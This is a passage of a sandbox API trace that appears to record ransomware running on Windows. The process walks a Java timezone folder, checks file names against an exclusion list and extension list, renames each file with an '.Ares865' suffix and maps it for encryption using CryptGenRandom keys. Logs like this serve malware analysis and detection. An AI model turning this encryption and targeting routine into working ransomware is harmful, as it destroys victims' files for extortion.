returned 7 [0133.063] lstrlenW (lpString=".dll") returned 4 [0133.063] lstrlenW (lpString=".lnk") returned 4 [0133.063] lstrlenW (lpString=".ini") returned 4 [0133.063] lstrlenW (lpString=".sys") returned 4 [0133.063] lstrlenW (lpString="GMT") returned 3 [0133.063] lstrlenW (lpString="bak") returned 3 [0133.063] lstrlenW (lpString="ba_") returned 3 [0133.063] lstrlenW (lpString="dbb") returned 3 [0133.063] lstrlenW (lpString="vmdk") returned 4 [0133.063] lstrlenW (lpString="rar") returned 3 [0133.063] lstrlenW (lpString="zip") returned 3 [0133.063] lstrlenW (lpString="tgz") returned 3 [0133.063] lstrlenW (lpString="vbox") returned 4 [0133.063] lstrlenW (lpString="vdi") returned 3 [0133.063] lstrlenW (lpString="vhd") returned 3 [0133.063] lstrlenW (lpString="vhdx") returned 4 [0133.064] lstrlenW (lpString="avhd") returned 4 [0133.064] lstrlenW (lpString="db") returned 2 [0133.064] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT.Ares865") returned 51 [0133.064] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt.ares865"), dwFlags=0x1) returned 1 [0133.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.065] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.065] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.066] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.066] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.066] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.069] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.069] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.070] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.070] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.070] lstrcpyW (in: lpString1=0x2cce450, lpString2="HST" | out: lpString1="HST") returned="HST" [0133.070] lstrlenW (lpString="HST") returned 3 [0133.070] lstrlenW (lpString="Ares865") returned 7 [0133.071] lstrlenW (lpString=".dll") returned 4 [0133.071] lstrlenW (lpString=".lnk") returned 4 [0133.071] lstrlenW (lpString=".ini") returned 4 [0133.071] lstrlenW (lpString=".sys") returned 4 [0133.071] lstrlenW (lpString="HST") returned 3 [0133.071] lstrlenW (lpString="bak") returned 3 [0133.071] lstrlenW (lpString="ba_") returned 3 [0133.071] lstrlenW (lpString="dbb") returned 3 [0133.071] lstrlenW (lpString="vmdk") returned 4 [0133.071] lstrlenW (lpString="rar") returned 3 [0133.071] lstrlenW (lpString="zip") returned 3 [0133.071] lstrlenW (lpString="tgz") returned 3 [0133.071] lstrlenW (lpString="vbox") returned 4 [0133.071] lstrlenW (lpString="vdi") returned 3 [0133.071] lstrlenW (lpString="vhd") returned 3 [0133.071] lstrlenW (lpString="vhdx") returned 4 [0133.071] lstrlenW (lpString="avhd") returned 4 [0133.071] lstrlenW (lpString="db") returned 2 [0133.071] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST.Ares865") returned 51 [0133.071] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst.ares865"), dwFlags=0x1) returned 1 [0133.072] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.072] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.073] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.073] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.073] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.074] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.075] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.076] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.077] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.077] lstrcpyW (in: lpString1=0x2cce450, lpString2="Indian" | out: lpString1="Indian") returned="Indian" [0133.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0133.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f2308 [0133.077] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0133.077] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74685fa0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74685fa0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MET", cAlternateFileName="")) returned 1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="aoldtz.exe") returned 1 [0133.078] lstrcmpiW (lpString1="MET", lpString2=".") returned 1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="..") returned 1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="windows") returned -1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="bootmgr") returned 1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="temp") returned -1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="pagefile.sys") returned -1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="boot") returned 1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="ids.txt") returned 1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="ntuser.dat") returned -1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="perflogs") returned -1 [0133.078] lstrcmpiW (lpString1="MET", lpString2="MSBuild") returned -1 [0133.078] lstrlenW (lpString="MET") returned 3 [0133.078] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian") returned 46 [0133.078] lstrcpyW (in: lpString1=0x2cce450, lpString2="MET" | out: lpString1="MET") returned="MET" [0133.078] lstrlenW (lpString="MET") returned 3 [0133.078] lstrlenW (lpString="Ares865") returned 7 [0133.078] lstrlenW (lpString=".dll") returned 4 [0133.078] lstrlenW (lpString=".lnk") returned 4 [0133.078] lstrlenW (lpString=".ini") returned 4 [0133.078] lstrlenW (lpString=".sys") returned 4 [0133.078] lstrlenW (lpString="MET") returned 3 [0133.078] lstrlenW (lpString="bak") returned 3 [0133.078] lstrlenW (lpString="ba_") returned 3 [0133.078] lstrlenW (lpString="dbb") returned 3 [0133.078] lstrlenW (lpString="vmdk") returned 4 [0133.078] lstrlenW (lpString="rar") returned 3 [0133.078] lstrlenW (lpString="zip") returned 3 [0133.078] lstrlenW (lpString="tgz") returned 3 [0133.078] lstrlenW (lpString="vbox") returned 4 [0133.078] lstrlenW (lpString="vdi") returned 3 [0133.078] lstrlenW (lpString="vhd") returned 3 [0133.078] lstrlenW (lpString="vhdx") returned 4 [0133.078] lstrlenW (lpString="avhd") returned 4 [0133.078] lstrlenW (lpString="db") returned 2 [0133.079] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET.Ares865") returned 51 [0133.079] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met.ares865"), dwFlags=0x1) returned 1 [0133.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MET.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\met.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.080] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1184) returned 1 [0133.080] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.081] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.081] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.081] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x170 [0133.082] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x190000 [0133.083] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.084] lstrcpyW (in: lpString1=0x2cce450, lpString2="MST" | out: lpString1="MST") returned="MST" [0133.084] lstrlenW (lpString="MST") returned 3 [0133.085] lstrlenW (lpString="Ares865") returned 7 [0133.085] lstrlenW (lpString=".dll") returned 4 [0133.085] lstrlenW (lpString=".lnk") returned 4 [0133.085] lstrlenW (lpString=".ini") returned 4 [0133.085] lstrlenW (lpString=".sys") returned 4 [0133.085] lstrlenW (lpString="MST") returned 3 [0133.085] lstrlenW (lpString="bak") returned 3 [0133.085] lstrlenW (lpString="ba_") returned 3 [0133.085] lstrlenW (lpString="dbb") returned 3 [0133.085] lstrlenW (lpString="vmdk") returned 4 [0133.085] lstrlenW (lpString="rar") returned 3 [0133.085] lstrlenW (lpString="zip") returned 3 [0133.085] lstrlenW (lpString="tgz") returned 3 [0133.085] lstrlenW (lpString="vbox") returned 4 [0133.085] lstrlenW (lpString="vdi") returned 3 [0133.085] lstrlenW (lpString="vhd") returned 3 [0133.085] lstrlenW (lpString="vhdx") returned 4 [0133.085] lstrlenW (lpString="avhd") returned 4 [0133.085] lstrlenW (lpString="db") returned 2 [0133.085] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST.Ares865") returned 51 [0133.085] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst.ares865"), dwFlags=0x1) returned 1 [0133.087] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.087] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.087] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.088] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.088] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.088] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.090] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.091] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.091] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.092] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.092] lstrcpyW (in: lpString1=0x2cce450, lpString2="MST7MDT.Ares865" | out: lpString1="MST7MDT.Ares865") returned="MST7MDT.Ares865" [0133.092] lstrlenW (lpString="MST7MDT.Ares865") returned 15 [0133.092] lstrlenW (lpString="Ares865") returned 7 [0133.092] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0133.092] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52a2f660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52a2f660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pacific", cAlternateFileName="")) returned 1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="aoldtz.exe") returned 1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2=".") returned 1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="..") returned 1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="windows") returned -1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="bootmgr") returned 1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="temp") returned -1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="pagefile.sys") returned -1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="boot") returned 1 [0133.092] lstrcmpiW (lpString1="Pacific", lpString2="ids.txt") returned 1 [0133.093] lstrcmpiW (lpString1="Pacific", lpString2="ntuser.dat") returned 1 [0133.093] lstrcmpiW (lpString1="Pacific", lpString2="perflogs") returned -1 [0133.093] lstrcmpiW (lpString1="Pacific", lpString2="MSBuild") returned 1 [0133.093] lstrlenW (lpString="Pacific") returned 7 [0133.093] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT.Ares865") returned 55 [0133.093] lstrcpyW (in: lpString1=0x2cce450, lpString2="Pacific" | out: lpString1="Pacific") returned="Pacific" [0133.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0133.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f2370 [0133.093] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0133.093] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746ac100, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x746ac100, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x746ac100, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PST8PDT", cAlternateFileName="")) returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="aoldtz.exe") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2=".") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="..") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="windows") returned -1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="bootmgr") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="temp") returned -1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="pagefile.sys") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="boot") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="ids.txt") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="ntuser.dat") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="perflogs") returned 1 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2="MSBuild") returned 1 [0133.093] lstrlenW (lpString="PST8PDT") returned 7 [0133.093] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific") returned 47 [0133.093] lstrcpyW (in: lpString1=0x2cce450, lpString2="PST8PDT" | out: lpString1="PST8PDT") returned="PST8PDT" [0133.093] lstrlenW (lpString="PST8PDT") returned 7 [0133.093] lstrlenW (lpString="Ares865") returned 7 [0133.093] lstrlenW (lpString=".dll") returned 4 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2=".dll") returned 1 [0133.093] lstrlenW (lpString=".lnk") returned 4 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2=".lnk") returned 1 [0133.093] lstrlenW (lpString=".ini") returned 4 [0133.093] lstrcmpiW (lpString1="PST8PDT", lpString2=".ini") returned 1 [0133.094] lstrlenW (lpString=".sys") returned 4 [0133.094] lstrcmpiW (lpString1="PST8PDT", lpString2=".sys") returned 1 [0133.094] lstrlenW (lpString="PST8PDT") returned 7 [0133.094] lstrlenW (lpString="bak") returned 3 [0133.094] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT.Ares865") returned 55 [0133.094] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt.ares865"), dwFlags=0x1) returned 1 [0133.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1272) returned 1 [0133.095] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.096] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.096] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.096] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x170 [0133.098] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0133.098] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.100] lstrcpyW (in: lpString1=0x2cce450, lpString2="SystemV" | out: lpString1="SystemV") returned="SystemV" [0133.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0133.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f23d8 [0133.100] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0133.100] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746d2260, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x746d2260, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x746d2260, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WET", cAlternateFileName="")) returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="aoldtz.exe") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2=".") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="..") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="windows") returned -1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="bootmgr") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="temp") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="pagefile.sys") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="boot") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="ids.txt") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="ntuser.dat") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="perflogs") returned 1 [0133.100] lstrcmpiW (lpString1="WET", lpString2="MSBuild") returned 1 [0133.100] lstrlenW (lpString="WET") returned 3 [0133.100] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV") returned 47 [0133.100] lstrcpyW (in: lpString1=0x2cce450, lpString2="WET" | out: lpString1="WET") returned="WET" [0133.100] lstrlenW (lpString="WET") returned 3 [0133.100] lstrlenW (lpString="Ares865") returned 7 [0133.100] lstrlenW (lpString=".dll") returned 4 [0133.100] lstrlenW (lpString=".lnk") returned 4 [0133.100] lstrlenW (lpString=".ini") returned 4 [0133.101] lstrlenW (lpString=".sys") returned 4 [0133.101] lstrlenW (lpString="WET") returned 3 [0133.101] lstrlenW (lpString="bak") returned 3 [0133.101] lstrlenW (lpString="ba_") returned 3 [0133.101] lstrlenW (lpString="dbb") returned 3 [0133.101] lstrlenW (lpString="vmdk") returned 4 [0133.101] lstrlenW (lpString="rar") returned 3 [0133.101] lstrlenW (lpString="zip") returned 3 [0133.101] lstrlenW (lpString="tgz") returned 3 [0133.101] lstrlenW (lpString="vbox") returned 4 [0133.101] lstrlenW (lpString="vdi") returned 3 [0133.101] lstrlenW (lpString="vhd") returned 3 [0133.101] lstrlenW (lpString="vhdx") returned 4 [0133.101] lstrlenW (lpString="avhd") returned 4 [0133.101] lstrlenW (lpString="db") returned 2 [0133.101] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET.Ares865") returned 51 [0133.101] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet.ares865"), dwFlags=0x1) returned 1 [0133.103] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.103] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1068) returned 1 [0133.103] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.104] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.104] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.104] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x170 [0133.106] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x190000 [0133.106] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.107] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.107] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 